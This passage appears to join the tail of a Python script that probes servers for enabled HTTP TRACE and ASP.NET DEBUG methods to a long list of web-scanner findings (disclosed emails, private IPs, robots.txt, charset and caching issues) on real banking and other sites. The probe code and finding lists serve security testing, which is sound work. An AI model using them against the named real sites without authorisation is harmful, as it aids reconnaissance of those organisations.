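    status, headers, body = parse_response(raw_response)
    request_line = request.split(b"\r\n", 1)[0]
    return (status == 200
            and headers.get("content-type", "").startswith("message/http")
            and request_line in body)


def aspnet_debug_enabled(raw_response: bytes) -> bool:
    """ASP.NET answers DEBUG with 200 and body 'OK' only when compilation debug="true" is set."""
    status, _, body = parse_response(raw_response)
    return status == 200 and body.strip() == b"OK"


def send_raw(host: str, port: int, request: bytes, use_tls: bool = False,
             timeout: float = 5.0) -> bytes:
    """Send a raw request over a socket and return the whole response (live use only)."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    chunks = []
    with sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


# Constructed responses for offline classification; example.test is a placeholder host.
TRACE_REQ = build_request("TRACE", "example.test", "/")
TRACE_RESP_ON = (b"HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n"
                 b"Connection: close\r\n\r\n" + TRACE_REQ)
TRACE_RESP_OFF = (b"HTTP/1.1 405 Method Not Allowed\r\nAllow: GET, HEAD, POST\r\n"
                  b"Content-Length: 0\r\n\r\n")
DEBUG_REQ = build_request("DEBUG", "example.test", "/Default.aspx", {"Command": "stop-debug"})
DEBUG_RESP_ON = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\nOK"
DEBUG_RESP_OFF = b"HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n\r\nDebugging is not enabled."


if __name__ == "__main__":
    print("TRACE enabled (sample):", trace_enabled(TRACE_REQ, TRACE_RESP_ON))
    print("ASP.NET debug enabled (sample):", aspnet_debug_enabled(DEBUG_RESP_ON))
    # Live check, against a host you are authorised to test:
    # print(trace_enabled(TRACE_REQ, send_raw("example.test", 80, TRACE_REQ)))
```

Two caveats for triage. The classic risk of TRACE was cross-site tracing, using a reflected request to read cookies that HttpOnly hides from script; browsers have blocked TRACE from XMLHttpRequest for years, so the finding is now a hardening item rather than an exploitable one. The DEBUG verb only tells you something if it reaches the ASP.NET pipeline; a reverse proxy or WAF that rejects unknown methods with 405 will mask the setting, so a negative result is not proof that debugging is off.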

26. Email addresses disclosed

26.1. http://419.myfunforum.org/sutra724.php/x22

26.2. http://adomas.org/javascript-mouse-wheel/

26.3. http://en.wikipedia.org/w/index.php

26.4. http://investors.fiserv.com/releasedetail.cfm

26.5. http://jqueryui.com/about

26.6. http://marketdata.set.or.th/scripts/JSCookMenu.js

26.7. http://moneytalk.scb.co.th/Scripts/jquery.mousewheel.js

26.8. http://nerdbots.com/contact.aspx

26.9. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp

26.10. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

26.11. http://register2.set.or.th/styles/calendar/popBirthdate.js

26.12. http://truehits.net/stat.php

26.13. http://twitter.com/KBank_Live

26.14. http://validator.w3.org/check

26.15. http://www.bangkokbank.com/_layouts/NR/JavaScript/CommonClient.js

26.16. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp

26.17. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

26.18. http://www.bangkokpost.com/forum/viewtopic.php

26.19. http://www.bot.or.th/english/Pages/BOTDefault.aspx

26.20. https://www.google.com/accounts/Login

26.21. https://www.google.com/accounts/ServiceLogin

26.22. http://www.independent.co.uk/news/world/asia/x26amp

26.23. http://www.independent.co.uk/news/world/x26amp

26.24. http://www.independent.co.uk/news/x26amp

26.25. http://www.ktam.co.th/en/alliance.php

26.26. http://www.ktam.co.th/en/index.php

26.27. http://www.ktam.co.th/en/index.php/a

26.28. http://www.ktam.co.th/en/index.php/declarationnav.php

26.29. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

26.30. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

26.31. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

26.32. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

26.33. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

26.34. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

26.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

26.36. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

26.37. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

26.38. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

26.39. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

26.40. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

26.41. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

26.42. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

26.43. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

26.44. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

26.45. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

26.46. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

26.47. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

26.48. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

26.49. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

26.50. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

26.51. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

26.52. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

26.53. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

26.54. http://www.ktam.co.th/en/index.php/ims/empty.gif

26.55. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

26.56. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

26.57. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

26.58. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

26.59. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

26.60. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

26.61. http://www.ktam.co.th/en/index.php/ims/mails.png

26.62. http://www.ktam.co.th/en/index.php/ims/news.php

26.63. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

26.64. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

26.65. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

26.66. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

26.67. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

26.68. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

26.69. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

26.70. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

26.71. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

26.72. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

26.73. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

26.74. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

26.75. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

26.76. http://www.ktam.co.th/en/index.php/media_box.php

26.77. http://www.ktam.co.th/en/index.php/news.inc.php

26.78. http://www.ktam.co.th/en/index.php/news.php

26.79. http://www.ktam.co.th/en/index.php/self_discovery.php

26.80. http://www.ktam.co.th/en/index.php/style/news.php

26.81. http://www.ktam.co.th/en/index.php/style/page.txt

26.82. http://www.ktam.co.th/en/news.php

26.83. http://www.ktam.co.th/th/news.php

26.84. http://www.ktb.co.th/css/master.css

26.85. http://www.mindworkscorp.com/

26.86. http://www.mindworkscorp.com/bio.html

26.87. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jQuery.inlinePager.js

26.88. http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni/_js/jquery.paginator.js

26.89. http://www.nbcuniversalstore.com/js/omniture/s_code_dageneral.js

26.90. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/typeface-0.15.js

26.91. https://www.scbbusinessnet.com/cs70_banking/js/jquery.mousewheel.js

26.92. https://www.scbbusinessnet.com/cs70_banking/news/Scripts/jquery.mousewheel.js

26.93. http://www.set.or.th/en/contact/contact.html

26.94. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

26.95. http://www.set.or.th/en/sitemap/for_listing.html

26.96. http://www.set.or.th/highlight/pr-th.html

26.97. http://www.set.or.th/scripts/JSCookMenu.js

26.98. http://www.zlmc.org/

26.99. http://www.zlmc.org/mindfulness-meditation.html

26.100. http://www2.itt-tech.edu/CFIDE/scripts/cfform.js

26.101. http://www2.itt-tech.edu/it/d/applynow/

27. Private IP addresses disclosed

27.1. http://get.adobe.com/flashplayer/

27.2. http://moneytalk.scb.co.th/

27.3. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/CormVv6JMOl.js

27.4. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/g5ZRpvzi0gh.css

27.5. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js

27.6. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/wFcdvtg8yWA.js

27.7. http://static.ak.fbcdn.net/rsrc.php/v1/zy/r/-cydlOAMbwG.png

27.8. http://www.facebook.com/campaign/landing.php

27.9. http://www.facebook.com/extern/login_status.php

27.10. http://www.facebook.com/extern/login_status.php

27.11. http://www.facebook.com/extern/login_status.php

27.12. http://www.facebook.com/pages/KTB-Care/178373518915

27.13. http://www.facebook.com/plugins/like.php

27.14. http://www.facebook.com/plugins/like.php

27.15. http://www.facebook.com/plugins/like.php

27.16. http://www.google.com/sdch/rU20-FBA.dct

27.17. http://www.set.or.th/

28. Credit card numbers disclosed

29. Robots.txt file

29.1. http://0.r.msn.com/

29.2. http://2-thai.com/bank.html/x22

29.3. http://318395.r.msn.com/

29.4. http://419.myfunforum.org/sutra724.php/x22

29.5. http://914188.r.msn.com/

29.6. http://a.unanimis.co.uk/fc.php

29.7. http://ad.doubleclick.net/adi/agt.nbcuni/homepage

29.8. http://ad.uk.doubleclick.net/activity

29.9. http://adfarm.mediaplex.com/ad/bk/7648-49630-3840-0

29.10. http://admin.instantservice.com/resources/smartbutton/6192/II_Servers.js

29.11. https://adwords.google.com/select/Login

29.12. http://answers.yahoo.com/question/index

29.13. http://api.bing.com/qsonhs.aspx

29.14. http://api.recaptcha.net/js/recaptcha_ajax.js

29.15. http://apps.barclays.co.uk/accessibility/

29.16. https://apps.barclays.co.uk/webchat/invite_background.jpg/u0022

29.17. http://b.scorecardresearch.com/b

29.18. http://banner2.set.or.th/www/delivery/afr.php

29.19. https://center.ktam.co.th/

29.20. http://cspix.media6degrees.com/orbserv/hbpix

29.21. http://de.wikipedia.org/wiki/Liste_der_Banken_in_Thailand

29.22. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

29.23. http://dis.us.criteo.com/dis/dis.aspx

29.24. http://docs.google.com/

29.25. http://domdex.com/f

29.26. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

29.27. http://en.m.wikipedia.org/wiki

29.28. http://en.wikipedia.org/wiki/List_of_banks_in_Thailand

29.29. https://eprocurement.ktb.co.th/

29.30. https://feedback.live.com/default.aspx

29.31. http://feeds.bbci.co.uk/news/rss.xml

29.32. http://financial-services-summarize-the-web.blogspot.com/2011/04/in-exchange-rate-bangkok-bank-exchange.html/x22

29.33. http://go.microsoft.com/fwlink/

29.34. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1045272592/

29.35. http://ipinfusion.com/products/data_sheets.html

29.36. http://ja.wikipedia.org/wiki/????????覧

29.37. http://jquery.org/license

29.38. http://jqueryui.com/about

29.39. http://ktbcare.hi5.com/

29.40. http://l.addthiscdn.com/live/t00/250lo.gif

29.41. http://mail.google.com/mail/

29.42. http://meta.wikimedia.org/w/index.php

29.43. http://metrics.seenon.com/b/ss/delagentnbc,delagentglobalrollup/1/H.17/s25651625484430

29.44. http://mls.marchex.com/c

29.45. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

29.46. http://news.google.com/news/story

29.47. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

29.48. http://now.eloqua.com/visitor/v200/svrGP.aspx

29.49. http://online.wsj.com/article/BT-CO-20110428-705019.html/x22

29.50. http://onlinehelp.microsoft.com/en-US/bing/ff808506.aspx

29.51. http://pagead2.googlesyndication.com/pagead/imgad

29.52. http://picasaweb.google.com/lh/view

29.53. http://piwik.org/

29.54. http://plugins.jquery.com/node/1208]

29.55. http://randomfactsthailand.com/thailand-breast-slap-sudden-breast-growth-without-surgery/x22

29.56. http://s7.addthis.com/static/r07/sh41.html

29.57. http://safebrowsing.clients.google.com/safebrowsing/downloads

29.58. http://scriptlogiccorp.d2.sc.omtrdc.net/b/ss/slcproduction/1/H.22.1/s27267301290655

29.59. http://sdc.bot.or.th/dcsw4pwnjm3f3ymhgt6lphzp1_5v7q/dcs.gif

29.60. http://search.yahoo.com/mrss/

29.61. https://secure.wikimedia.org/

29.62. http://sorgalla.com/jcarousel/

29.63. http://stackoverflow.com/questions/467336

29.64. http://th.linkedin.com/in/narongchai

29.65. http://th.wikipedia.org/wiki/รายชื่อธนาคารในประเทศไทย

29.66. http://thailandforvisitors.com/general/holidays/x22

29.67. http://toolbarqueries.clients.google.com/tbproxy/af/query

29.68. http://topics.nytimes.com/top/news/business/

29.69. http://translate.google.com/translate_t

29.70. http://translatewiki.net/wiki/MediaWiki:Collapsible-collapse/en

29.71. http://trends.atipat.co.cc/thailand-breast-slap/x22

29.72. http://tv.popcrunch.com/snl-commercials-barkleys-bank-peepers-insurance-video/

29.73. http://twitter.com/ktb_care

29.74. http://v13.lscache4.googlevideo.com/videoplayback

29.75. http://validator.w3.org/check

29.76. http://video.google.com/videoplay%3Fdocid%3D4479130566581116930&rct=j&sa=X&ei=qeq_Tfr2CsOTtweWz5GlBQ&ved=0CG4QwQ0&q=Krung+Thai+Bank&usg=AFQjCNFRaUm-pTmcyp71nTEaQ8bjdxaWkg/x22

29.77. http://webcache.googleusercontent.com/search

29.78. http://webmail.aol.com/

29.79. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London

29.80. http://wikimediafoundation.org/wiki/Special:Landingcheck

29.81. http://wikipediareview.com/index.php

29.82. http://www.360travelguide.com/travel_guides.asp/x26amp

29.83. http://www.adobe.com/shockwave/download/download.cgi

29.84. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp

29.85. http://www.barclays.com/privacy/com_privacy.html

29.86. http://www.bot.or.th/english/

29.87. http://www.coolthaihouse.com/forum/viewtopic.php

29.88. http://www.facebook.com/plugins/like.php

29.89. http://www.google-analytics.com/__utm.gif

29.90. http://www.google.com/search

29.91. https://www.google.com/accounts/ServiceLogin

29.92. http://www.googleadservices.com/pagead/conversion/1045272592/

29.93. http://www.independent.co.uk/news/world/asia/x26amp

29.94. http://www.mindworkscorp.com/

29.95. http://www.multimap.com/clients/places.cgi

29.96. http://www.nbcuniversalstore.com/nbcuniversalstore/behavior/ajaxConfig1.js

29.97. http://www.newsroom.barclays.com/content/Detail.aspx

29.98. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610

29.99. http://www.sedoparking.com/search/registrar.php

29.100. http://www.thailandhotelforums.com/forum/index.php

29.101. http://www.youtube.com/results

29.102. http://www.zlmc.org/mindfulness-meditation.html

30. Cacheable HTTPS response

30.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

30.2. https://csc.scb.co.th/

30.3. https://csc.scb.co.th/webclient1/bcm_signin.jsp

30.4. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

30.5. https://csc.scb.co.th/webclient1/index.jsp

30.6. https://dimenxion.bangkokbank.com/bonprd/js/statusbar.js

30.7. https://ebank.kasikornbankgroup.com/kbiznet/login.html

30.8. https://eprocurement.ktb.co.th/

30.9. https://ksupplychain.kasikornbank.com/

30.10. https://secure.wikimedia.org/

30.11. https://www.barclaysfantasyfundmanager.co.uk/

30.12. https://www.bizpayment.ktb.co.th/epayview/

30.13. https://www.ktb.co.th/internetservice/onlineAccountAction.do

30.14. https://www.newcb.ktb.co.th/

30.15. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

30.16. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

30.17. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt

30.18. https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html

30.19. https://www.scbeasy.com/1st_pg.html

31. HTML does not specify charset

31.1. https://apps.barclays.co.uk/chatl19mV7j/_web6Tfs5lJV6xM.php/u0027,/u0027chatclient/u0027,/u0027width=640,height=480,scrollbars=0/u0027

31.2. https://csc.scb.co.th/

31.3. https://feedback.live.com/default.aspx

31.4. http://home.controlcase.com/piwik/piwik.php

31.5. https://ibank.barclays.co.uk/olb/w/BasicAccessStart.do

31.6. https://ibank.barclays.co.uk/olb/w/FeedbackOverview.do

31.7. https://ibank.barclays.co.uk/olb/w/ForgottenCardReaderBusiness.do

31.8. https://ibank.barclays.co.uk/olb/w/IndividualSavingsAcctOverview.do

31.9. https://ibank.barclays.co.uk/olb/w/LoanOverview.do

31.10. https://ibank.barclays.co.uk/olb/w/LoginMember.do

31.11. https://ibank.barclays.co.uk/olb/w/MobiLoginMember.do

31.12. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do

31.13. https://ibank.barclays.co.uk/olb/w/TakeonPersonal.do

31.14. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do

31.15. https://icustody.bangkokbank.com/favicon.ico

31.16. https://ifunds.bangkokbank.com/favicon.ico

31.17. https://ipay.bangkokbank.com/bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp

31.18. http://jqueryui.com/about

31.19. http://jscrollpane.kelvinluck.com/

31.20. https://ksupplychain.kasikornbank.com/

31.21. http://m1645.ic-live.com/515/

31.22. http://moneytalk.scb.co.th/

31.23. http://moneytalk.scb.co.th/en/

31.24. http://moneytalk.scb.co.th/en/include/bank-online.html

31.25. http://moneytalk.scb.co.th/en/include/footer.html

31.26. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

31.27. http://moneytalk.scb.co.th/th/include/bank-online.html

31.28. http://moneytalk.scb.co.th/th/include/footer.html

31.29. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

31.30. http://now.eloqua.com/visitor/v200/svrGP.aspx

31.31. http://register2.set.or.th/

31.32. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp

31.33. http://www.barclays.com/importantinfo/

31.34. http://www.kasikornbank.com/Pages/truehitsstat.html

31.35. http://www.ktam.co.th/media_box.php

31.36. http://www.mindworkscorp.com/

31.37. http://www.mindworkscorp.com/bio.html

31.38. https://www.scb-fx.com/

31.39. https://www.scb-fx.com/favicon.ico

31.40. http://www.scbbusinessnet.com/

31.41. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html

31.42. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html

31.43. http://www.scbeasy.com/

31.44. http://www.set.or.th/

31.45. http://www.set.or.th/en/contact/index.html

31.46. http://www.thailandguru.com/thailand-baht-money-transfer-banking-accounts.html#cards/x26amp

31.47. http://www.zlmc.org/membership.html

31.48. http://www22.glam.com/cTagsImg.act

32. HTML uses unrecognised charset

32.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp

32.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp

32.3. https://csc.scb.co.th/webclient1/index.jsp

32.4. https://ebank.kasikornbankgroup.com/kbiznet/login.html

32.5. https://eprocurement.ktb.co.th/

32.6. https://ibanking.bangkokbank.com/

32.7. https://ibanking.bangkokbank.com/BiB/index.html

32.8. https://ifunds.bangkokbank.com/Login.aspx

32.9. http://marketdata.set.or.th/head-en.html

32.10. http://marketdata.set.or.th/mkt/topten.do

32.11. http://marketdata.set.or.th/shortcut-en.html

32.12. http://marketdata.set.or.th/static/market/set/indextab_en_US.html

32.13. http://moneytalk.scb.co.th/

32.14. http://moneytalk.scb.co.th/index.asp

32.15. https://online.kasikornbankgroup.com/K-Online/ib/login_en.jsp

32.16. http://register2.set.or.th/semreg/detail.aspx

32.17. http://register2.set.or.th/semreg/enroll.aspx

32.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/price_update.php

32.19. http://sorgalla.com/

32.20. http://sorgalla.com/jcarousel/

32.21. http://truehits.net/

32.22. http://truehits.net/stat.php

32.23. http://www.bangkokbank.com/_layouts/NR/BangkokBankWebApps/Email%20Registration/subscribe.asp

32.24. http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp

32.25. http://www.bangkokbank.com/_layouts/nr/BangkokBankWebApps/BLSresearch/MainBLS.asp

32.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/FXRatesRssEn.htm

32.27. http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm

32.28. http://www.business.barclays.co.uk/BRC1/jsp/brccontrol

32.29. http://www.ktam.co.th/en/alliance.php

32.30. http://www.ktam.co.th/en/declarationnav.php

32.31. http://www.ktam.co.th/en/index.php

32.32. http://www.ktam.co.th/en/index.php/a

32.33. http://www.ktam.co.th/en/index.php/declarationnav.php

32.34. http://www.ktam.co.th/en/index.php/ims/ads_csi300_2.gif

32.35. http://www.ktam.co.th/en/index.php/ims/b_ktam_news11.gif

32.36. http://www.ktam.co.th/en/index.php/ims/b_ktam_news12.gif

32.37. http://www.ktam.co.th/en/index.php/ims/b_ktam_news13.gif

32.38. http://www.ktam.co.th/en/index.php/ims/b_ktam_news21.gif

32.39. http://www.ktam.co.th/en/index.php/ims/b_ktam_news22.gif

32.40. http://www.ktam.co.th/en/index.php/ims/b_ktam_news23.gif

32.41. http://www.ktam.co.th/en/index.php/ims/b_nav11.gif

32.42. http://www.ktam.co.th/en/index.php/ims/b_nav12.gif

32.43. http://www.ktam.co.th/en/index.php/ims/b_nav13.gif

32.44. http://www.ktam.co.th/en/index.php/ims/b_nav21.gif

32.45. http://www.ktam.co.th/en/index.php/ims/b_nav22.gif

32.46. http://www.ktam.co.th/en/index.php/ims/b_nav23.gif

32.47. http://www.ktam.co.th/en/index.php/ims/bg_cr1.gif

32.48. http://www.ktam.co.th/en/index.php/ims/bg_head1.gif

32.49. http://www.ktam.co.th/en/index.php/ims/bg_mmenu01.gif

32.50. http://www.ktam.co.th/en/index.php/ims/bg_mmenu02.gif

32.51. http://www.ktam.co.th/en/index.php/ims/bg_search1.gif

32.52. http://www.ktam.co.th/en/index.php/ims/bt_about1.gif

32.53. http://www.ktam.co.th/en/index.php/ims/bt_agent1.gif

32.54. http://www.ktam.co.th/en/index.php/ims/bt_education_center1.gif

32.55. http://www.ktam.co.th/en/index.php/ims/bt_home2.gif

32.56. http://www.ktam.co.th/en/index.php/ims/bt_news1.gif

32.57. http://www.ktam.co.th/en/index.php/ims/bt_service1.gif

32.58. http://www.ktam.co.th/en/index.php/ims/cmd_search1.gif

32.59. http://www.ktam.co.th/en/index.php/ims/empty.gif

32.60. http://www.ktam.co.th/en/index.php/ims/h_download1.gif

32.61. http://www.ktam.co.th/en/index.php/ims/h_link1.gif

32.62. http://www.ktam.co.th/en/index.php/ims/i_acrobat.gif

32.63. http://www.ktam.co.th/en/index.php/ims/i_firefox.gif

32.64. http://www.ktam.co.th/en/index.php/ims/i_flash.gif

32.65. http://www.ktam.co.th/en/index.php/ims/i_winmedia.gif

32.66. http://www.ktam.co.th/en/index.php/ims/mails.png

32.67. http://www.ktam.co.th/en/index.php/ims/news.php

32.68. http://www.ktam.co.th/en/index.php/ims/p_flag_th.gif

32.69. http://www.ktam.co.th/en/index.php/ims/p_ktamnew.gif

32.70. http://www.ktam.co.th/en/index.php/ims/p_ktamonline.gif

32.71. http://www.ktam.co.th/en/index.php/ims/p_line001.gif

32.72. http://www.ktam.co.th/en/index.php/ims/p_line002.gif

32.73. http://www.ktam.co.th/en/index.php/ims/p_link01.gif

32.74. http://www.ktam.co.th/en/index.php/ims/p_link02.gif

32.75. http://www.ktam.co.th/en/index.php/ims/p_link03.gif

32.76. http://www.ktam.co.th/en/index.php/ims/p_link04.gif

32.77. http://www.ktam.co.th/en/index.php/ims/p_link05.gif

32.78. http://www.ktam.co.th/en/index.php/ims/p_link06.gif

32.79. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif

32.80. http://www.ktam.co.th/en/index.php/ims/p_word1.gif

32.81. http://www.ktam.co.th/en/index.php/media_box.php

32.82. http://www.ktam.co.th/en/index.php/news.inc.php

32.83. http://www.ktam.co.th/en/index.php/news.php

32.84. http://www.ktam.co.th/en/index.php/self_discovery.php

32.85. http://www.ktam.co.th/en/index.php/style/news.php

32.86. http://www.ktam.co.th/en/index.php/style/page.txt

32.87. http://www.ktam.co.th/en/news.inc.php

32.88. http://www.ktam.co.th/pop_up.php

32.89. https://www.ktamsmarttrade.com/FrontWeb/Home/Login.aspx

32.90. https://www.ktb.co.th/internetservice/onlineAccountAction.do

32.91. https://www.newcb.ktb.co.th/

32.92. http://www.scb.co.th/scb_api/scbapi.jsp

32.93. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser

32.94. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/download

32.95. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/information

32.96. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/logon_th

32.97. https://www.scbbusinessnet.com/cs70_banking/logon/sbuser/securetip

32.98. http://www.set.or.th/en/contact/contact.html

32.99. http://www.set.or.th/en/index.html

32.100. http://www.set.or.th/en/integrated-set.html

32.101. http://www.set.or.th/en/news/issuer_activities/ipo_showcase/set_ipo_showcase_p1.html

32.102. http://www.set.or.th/en/products/index/setindex_p1.html

32.103. http://www.set.or.th/en/regulations/cg/roles_p1.html

32.104. http://www.set.or.th/en/sitemap/for_listing.html

32.105. http://www.set.or.th/head-en.html

32.106. http://www.set.or.th/highlight/info_en.html

32.107. http://www.set.or.th/highlight/info_th.html

32.108. http://www.set.or.th/highlight/pr-th.html

32.109. http://www.set.or.th/highlight/release_en_US.html

32.110. http://www.set.or.th/nicepage_404.html

32.111. http://www.set.or.th/set/oppdaybyperiod.do

32.112. http://www.set.or.th/shortcut-en.html

32.113. http://www.set.or.th/shortcut-th.html

32.114. http://www.set.or.th/static/news/latestnews_en_US.html

32.115. http://www.set.or.th/static/news/latestnews_th_TH.html

32.116. http://www.set.or.th/th/index.html

32.117. http://www.set.or.th/th/integrated-set.html

32.118. http://www.thailandhotelforums.com/forum/index.php

33. Content type incorrectly stated

33.1. https://feedback.live.com/default.aspx

33.2. http://group.barclays.com/assets/img/icons/favicon.ico

33.3. http://group.barclays.com/cs/Satellite

33.4. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.eot

33.5. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-light-webfont.woff

33.6. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.eot

33.7. http://group.barclays.com/html_phase_2/assets/css/fonts/expertsans-regular-webfont.woff

33.8. http://lvs.truehits.in.th/goggen.php

33.9. http://meta.wikimedia.org/w/index.php

33.10. http://moneytalk.scb.co.th/css/style.txt

33.11. http://moneytalk.scb.co.th/css/style_th.txt

33.12. http://moneytalk.scb.co.th/en/include/bank-online.html

33.13. http://moneytalk.scb.co.th/en/include/scb-quick-link.html

33.14. http://moneytalk.scb.co.th/th/include/bank-online.html

33.15. http://moneytalk.scb.co.th/th/include/footer.html

33.16. http://moneytalk.scb.co.th/th/include/scb-quick-link.html

33.17. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.18. http://rtradeinfo.bualuang.co.th/tradinginfo.services/css/bbl_style.css

33.19. http://sedoparking.com/r/ads/adcode.js

33.20. http://tc.barclays.co.uk/c

33.21. http://www.bangkokbank.com/Bangkok%20Bank/Pages/Forms/AllItems.aspx

33.22. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/Authenticate.aspx

33.23. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/viewlsts.aspx

33.24. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

33.25. http://www.bangkokbank.com/_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg

33.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/ratebanner.css

33.27. http://www.barclays.co.uk/cs/Satellite

33.28. http://www.barclays.co.uk/images/premier_league_masthead.jpg

33.29. http://www.facebook.com/extern/login_status.php

33.30. http://www.google.com/search

33.31. http://www.kasikornbank.com/SiteCollectionDocuments/scripts/start.js

33.32. http://www.ktam.co.th/en/news.inc.php

33.33. http://www.ktam.co.th/en/style/page.txt

33.34. http://www.ktam.co.th/media_box.php

33.35. http://www.ktb.co.th/flash/a1.swf

33.36. http://www.ktb.co.th/flash/a2.swf

33.37. http://www.ktb.co.th/flash/a3.swf

33.38. http://www.ktb.co.th/flash/b1.swf

33.39. http://www.ktb.co.th/flash/b2.swf

33.40. http://www.ktb.co.th/flash/b3.swf

33.41. http://www.ktb.co.th/flash/c1.swf

33.42. http://www.ktb.co.th/flash/c2.swf

33.43. http://www.ktb.co.th/flash/c3.swf

33.44. http://www.ktb.co.th/flash/d1.swf

33.45. http://www.ktb.co.th/flash/d2.swf

33.46. http://www.ktb.co.th/flash/d3.swf

33.47. http://www.ktb.co.th/flash/e1.swf

33.48. http://www.ktb.co.th/flash/e2.swf

33.49. http://www.ktb.co.th/flash/e3.swf

33.50. http://www.ktb.co.th/flash/f1.swf

33.51. http://www.ktb.co.th/flash/f2.swf

33.52. http://www.ktb.co.th/flash/f3.swf

33.53. http://www.ktb.co.th/flash/home_show_flash1.swf

